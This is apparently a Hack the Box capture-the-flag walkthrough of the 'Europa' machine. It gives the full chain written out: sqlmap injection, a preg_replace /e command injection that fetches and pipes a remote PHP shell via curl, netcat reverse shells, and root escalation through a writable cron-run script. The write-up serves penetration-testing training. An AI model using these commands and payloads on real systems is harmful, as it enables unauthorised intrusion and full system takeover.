Today we are going to solve another CTF challenge “Europa” which is available online for those who want to increase their skill in penetration testing. Europa is retried vulnerable lab presented by Hack the Box.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.22 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-21 15:43 W. Europe Standard Time Nmap scan report for 10.10.10.22 Host is up (0.025s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA) | 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA) |_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works | ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb | Not valid before: 2017-04-19T09:06:22 |_Not valid after: 2027-04-17T09:06:22 |_ssl-date: TLS randomness does not represent time | tls-alpn: | http/1.1 | http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 67.94 seconds
As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that tradition in this also but Bad Unluckily!! This time it didn’t work at all.
Now the last option was to add target IP inside /etc/host file since port 443 was open containing two domain names and as it is a challenge of hack the box thus I edit europacorp.htb and admin-portal.europcorp.htb as a hostname.
Then I explore domain name: admin-portal.europcorp.htb through the web browser and found following login page as shown below.
In order breach confidentiality we can try SQL form based attack and for this, I preferred sqlmap following command to enumerate database name.
sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form --dbs --batch
Luckily our assumption set true and it dumbs the database name “admin”.
Then I run following command for enumerating entire table details.
sqlmap -u 'https://admin-portal.europacorp.htb/login.php' --form -D admin --all --batch
Awesome!! I found a table “users” which 2 entries having the username and password columns.
Using online MD5 decryption I cracked hash password and received “SupersecretPassword!” and use these credential to login into admin console.
After fruitfully validation I got dashboard from where I step towards Tools options.
It was set up with a script for open VPN generator using the PHP function preg_replace() on user input. When I investigate more related to this function, it is suggested not to use preg_replace() on user input as it can lead to command execution vulnerability.
Considering above suggestion true, I fetched its request into burp suite and sent it to the repeater for exploit command injection vulnerability.
Here I notice three parameter pattern, ipaddress, and test where we can add our arbitrary code for execution but before that, you need to know correct step “how to exploit it” manually.
So when I search more related to this then I found so many links which was describing /e option is a threat to PHP preg_replace function.
Now the code can be execute by sending http post request as given below format.
pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres
For example: To check directory list we can run following command and verify resultant output.
pattern=/ip_address/e&ipaddress=ls &text=ip_addres
Similarly we can run any malicious code inside this for achieving reversion connection.
Now it’s just the matter changing the system() command parameters and getting a reverse shell. Set up an http server for serving the php file. and a netcat listener for catching the shell
D:\PENTEST\HTB\europa>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.22 - - [07/Nov/2018 09:22:20] "GET /shell.php HTTP/1.1" 200 -
next burp : system('curl http://10.10.14.28/shell.php | php')
C:\Users\hillie>nc -lvp 443 listening on [any] 443 ... connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 43764 Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 10:16:14 up 13:06, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@europa:/var/www/cmd$ whoami && id whoami && id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege escalation
Following my usual information gathering steps I find a running vulnerable cronjob!
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you do not have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /var/www/cronjobs/clearlogs <---- THIS ONE HERE
Cron is calling a clearlogs script at /var/www/cronjobs/clearlogs
with root privileges. Content of clearlogs:
$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
Clearlogs script clears access.log and executes /var/www/cmd/logcleared.sh
which we have write access to! (OR if the file doesn’t exist, create it and chmod 777 it). Because we can write to the file, we can control what is written in it. Long story short, we can easily control what will be executed as root each time the cron job runs. I just made another reverse shell which connected to me –
echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9876 > /tmp/f" > script.sh
Note: Make sure both netcat connections are connected via a different port, using the same one won’t work.
Once the cronjob calls /var/www/cronjobs/clearlogs
our malicious logcleared.sh file will be executed which will give us a root shell!
C:\Users\hillie>nc -lvp 9876 listening on [any] 9876 ... connect to [10.10.14.28] from www.europacorp.htb [10.10.10.22] 49460 /bin/sh: 0: can't access tty; job control turned off # python3 -c 'import pty;pty.spawn("/bin/bash")' root@europa:~# whoami && id && hostname whoami && id && hostname root uid=0(root) gid=0(root) groups=0(root) europa
Author : Jacco Straathof